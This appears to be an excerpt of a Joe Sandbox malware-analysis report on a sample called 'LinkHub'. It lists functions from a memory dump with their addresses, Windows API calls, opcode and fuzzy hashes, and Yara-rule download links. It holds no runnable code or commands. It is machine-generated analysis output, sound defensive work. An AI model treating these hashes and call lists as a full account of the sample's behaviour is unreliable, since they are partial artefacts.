Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 2929296749-0
Opcode ID: 046860a27650c603f2485ae5e4c9531528574eda50aaf80c028bdb7b4a3755d9
Instruction ID: b7ef15e837f9fde928d826f3a98bfea48f12000a6868d43ee40f4be35eae4346
Opcode Fuzzy Hash: 046860a27650c603f2485ae5e4c9531528574eda50aaf80c028bdb7b4a3755d9
Instruction Fuzzy Hash: C0E01232024611EBC7303F65E909A56BBE4BF04312F20889FF09A56921CB70A4949B08

Function 00B0CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B0CEEE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: ad0d2f2429061d419bf1e041b15a05b4b23e1897b61cb6848c45e4f32b58bf6f
Instruction ID: 02d9b89efd7957409840dd3f664f492e844ace9d3c60a0caab120a1f568504bb
Opcode Fuzzy Hash: ad0d2f2429061d419bf1e041b15a05b4b23e1897b61cb6848c45e4f32b58bf6f
Instruction Fuzzy Hash: C1329C74A002099FDB20DF58C884BBABFF5EB44314F1486EAEC15AB291DB34ED45CB91

Function 00B87AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 9052e38e4924bcec72fc7e89fe909eba0b8268b2c4fa0ce6480faac4179324be
Instruction ID: 508c17fc57544e7b51a06ce4ad1a89b411f80263c382a291c186330efb9194df
Opcode Fuzzy Hash: 9052e38e4924bcec72fc7e89fe909eba0b8268b2c4fa0ce6480faac4179324be
Instruction Fuzzy Hash: 14D13C75A04209EFCB14EF98D4919ADBBF5FF48314F248199E515AB2A1DB30EE81CF90

Function 00B2F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf3cf254933e4da83c6c98ffb149a753b5f551bf10c83894a8f8a0604e7a7f0
Instruction ID: 5e24bb33707ca055fe7c85a0132d60f0f6c7f5efcbbd4398e909b7f2ccb7aab9
Opcode Fuzzy Hash: 2bf3cf254933e4da83c6c98ffb149a753b5f551bf10c83894a8f8a0604e7a7f0
Instruction Fuzzy Hash: 6851A235A00129EFDB14DF68E841AB97BF1EB86364F1981B8F81C9B391D771AD42CB50

Function 00B06679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B0668B,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B0664A
Part of subcall function 00B0663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B0665C
Part of subcall function 00B0663E: FreeLibrary.KERNEL32(00000000,?,?,00B0668B,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B0666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B066AB

Part of subcall function 00B06607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B45657,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B06610
Part of subcall function 00B06607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B06622
Part of subcall function 00B06607: FreeLibrary.KERNEL32(00000000,?,?,00B45657,?,?,00B062FA,?,00000001,?,?,00000000), ref: 00B06635

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: e10b7b316124a2e17f80898a605275109eb99572c847eaec706530c8f444280d
Instruction ID: c4021ef955a7799496029a1c53ee7154869b08e1dcabe0a1e4ee69e764348183
Opcode Fuzzy Hash: e10b7b316124a2e17f80898a605275109eb99572c847eaec706530c8f444280d
Instruction Fuzzy Hash: 0E11E772640205ABCF14AB20C902BED7FE59F50710F1084AEF453A61C2EE76DA25EB50

Function 00B08577 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B0858A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 8ca42f0670769caf6f9472c2f024bfa7e5cfc39ca2f7b5400637e3748a871f70
Instruction ID: 0d61e166d744a56d9441b26ae01c12b61a8cc03d84841cb03dfabae3752de015
Opcode Fuzzy Hash: 8ca42f0670769caf6f9472c2f024bfa7e5cfc39ca2f7b5400637e3748a871f70
Instruction Fuzzy Hash: C81108B2204600AFD7159F28EC42B6A7BE4EF14350F20856EF55ECA6F1DF32AA50CB44

Function 00B38782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00B387C0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8e9a458265bf8bf9c896feb34227351f9c64c01e65ba3545a0b7680c3168f4eb
Instruction ID: 79829a5228619cc8f9a079ed9152e684ff9bf28cd3b699e5956adb2fd17026fd
Opcode Fuzzy Hash: 8e9a458265bf8bf9c896feb34227351f9c64c01e65ba3545a0b7680c3168f4eb
Instruction Fuzzy Hash: 871118B590420AAFCF05DF58E94599A7BF5EF48310F2140A9F809AB311DA31EE11CB65

Function 00B35373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B34FF0: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B3319C,00000001,00000364,?,00B20165,?,?,00B711D9,0000FFFF), ref: 00B35031

_free.LIBCMT ref: 00B353DF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: 9bfaf2cdff616177cceafca52ea8d553a31b5ac53fa3a38563d1665f26e70d54
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 4301F9B22007056BE3318F69D881E5AFBEDEB85370F75056DE58583280EB70A905C774

Function 00B2E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction ID: 9510d23914451408c4a680d6d24f464b8ac01664dc112643a866a665e608e8cb
Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction Fuzzy Hash: 1DF0A432501A3056D6313A6BBC15B6A33D8DF42334F2447A7F539971D1EA74E8428696

Function 00B0B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B0B333

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
Instruction ID: 76758f172d7bed1148c9e8ba27d4e4c2b072bac2717d50309e217e05328a4f6b
Opcode Fuzzy Hash: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
Instruction Fuzzy Hash: 08F0C8B36017146ED7149F28D806F66BFE8EB44360F10856AFA1DCB1D1DB71E5208BA4

Function 00B7F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00B7F987

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 63e1f350354a1b8cb89c59b8c3cf609ac95003a3de2f9e2be340a58efcf883e9
Instruction ID: 291c2cefdaec1bda49868d230b102148a94527fdc13142dbf52fb3bff51a79de
Opcode Fuzzy Hash: 63e1f350354a1b8cb89c59b8c3cf609ac95003a3de2f9e2be340a58efcf883e9
Instruction Fuzzy Hash: 77F08C72610215BFCB00EBA5DC46D9EBBF8EF49720F004095F609AB261DA70EA41C761

Function 00B34FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B3319C,00000001,00000364,?,00B20165,?,?,00B711D9,0000FFFF), ref: 00B35031

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 149cfea7faf0026c5580e31e5d969037ac0dfa4c489495f974a24c2d1eb7d514
Instruction ID: dcd7a94d7f0b0225f95e174f5675d6f91f7849d5dedd7be0e87a30b002790f79
Opcode Fuzzy Hash: 149cfea7faf0026c5580e31e5d969037ac0dfa4c489495f974a24c2d1eb7d514
Instruction Fuzzy Hash: A0F0B436551E34A6DB395E269C01B5A37D8EF407A0F3580A2B818A70A0DA32D80186E4

Function 00B33B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B20165,?,?,00B711D9,0000FFFF), ref: 00B33BC5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 52725f7a2dd0cd67ab692a27d82ebd5eb5983215d15d48779f0fe865cb5c6c4b
Instruction ID: ea038476aa3db4a56b04698b67fa4c617e4f395cb5589a465ecedd488db83b9b
Opcode Fuzzy Hash: 52725f7a2dd0cd67ab692a27d82ebd5eb5983215d15d48779f0fe865cb5c6c4b
Instruction Fuzzy Hash: DBE06D21251631A6DA312F76AD01B5BBAD8EF41BA0F3501E1EC09A75A1FF74CE4485A4

Function 00B066E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58aebafa1dfc3935447db00af2b2872f5cad98d09bcdccac135242dbebeafaa7
Instruction ID: 932875264c9ddac4a62f7c7f5460331c3da4f9f5f0dd0817442d205a8285ce59
Opcode Fuzzy Hash: 58aebafa1dfc3935447db00af2b2872f5cad98d09bcdccac135242dbebeafaa7
Instruction Fuzzy Hash: 49F03971505B12CFDB349F65E8A0816BBF4FF1432932489BEE5DA86611C7329C90DF10

Function 00B0684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B06868

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: abc4ac3e7d5348b253574222653377a914682d166309ddbc72926d6848ebe870
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: D2F0F87550020DFFDF05DF94C941E9E7BB9FB04318F208485F9159A151C336EA21ABA1

Function 00B03907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B03963

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 03fa6180ddd11712edf7660c50066f2bd8bcf44979d0b113aabeb65849f4979b
Instruction ID: 2fc70e1283d1c615b0123dddf64c9f7abfdf54ceac94d11fdd371052e6387b5c
Opcode Fuzzy Hash: 03fa6180ddd11712edf7660c50066f2bd8bcf44979d0b113aabeb65849f4979b
Instruction Fuzzy Hash: B8F0A7709003549FE7529F24DC49795BBFCA701708F0000E6A248A7281EB745788CF55

Function 00B03A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B03A76

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: fabcf2552ba9c7d293904ab74703524b2997b30063b321823e3d23231419999b
Instruction ID: 2a09d0aff8eb1adde5af1a9c07bc3890d4df5a0263cb46f6d1235788f8d9dd90
Opcode Fuzzy Hash: fabcf2552ba9c7d293904ab74703524b2997b30063b321823e3d23231419999b
Instruction Fuzzy Hash: 62E0C272A002245BCB20A758EC06FEA77EDDFC87A0F0440B1FC09D7258DDA0EE809690

Function 00B6E83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00B6E857

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: f21e08a037dee77e8ea1d7f0fa3a3e3e20b6903c156dd0e9d45c5c39ed5e6828
Instruction ID: fa2f41cb6ba832093d30ff1e695b3a92a8e4b269705478543ae11224afba2c17
Opcode Fuzzy Hash: f21e08a037dee77e8ea1d7f0fa3a3e3e20b6903c156dd0e9d45c5c39ed5e6828
Instruction Fuzzy Hash: 93D05EA19002282BDF60A675AD0DDFB3AACCB44210F0046A178ADD3292ED30EE4486E0

Function 00B712EB Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00B71306

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 137dbfc00cf9f4918de25764cde86e16ec5c8d22c547306a52b7e10bf8eaf4be
Instruction ID: 6a3a11c96824b7dde4bf9424088af8e229c2577ce453ec66c4e5028e70e27226
Opcode Fuzzy Hash: 137dbfc00cf9f4918de25764cde86e16ec5c8d22c547306a52b7e10bf8eaf4be
Instruction Fuzzy Hash: 6CD0A7B2522324BF9F2CCB69CE4ACA776DCE901655380156FB402E2940F5F0FD00CAB0

Function 00B4071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B40A84,?,?,00000000,?,00B40A84,00000000,0000000C), ref: 00B40737

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ecd897ba6b086a3944fd25ced7e47762ed9e7966d04109b0f5e3df206e8931ea
Instruction ID: 69868f0ea11167fd72ebf22ea8a1f3ca59bc78ac1ad20b6c38434923011ff57c
Opcode Fuzzy Hash: ecd897ba6b086a3944fd25ced7e47762ed9e7966d04109b0f5e3df206e8931ea
Instruction Fuzzy Hash: 40D06C3200010DBBDF028F85DD06EDA3BAAFB48714F014000BE1866020C732E821AB94

Non-executed Functions

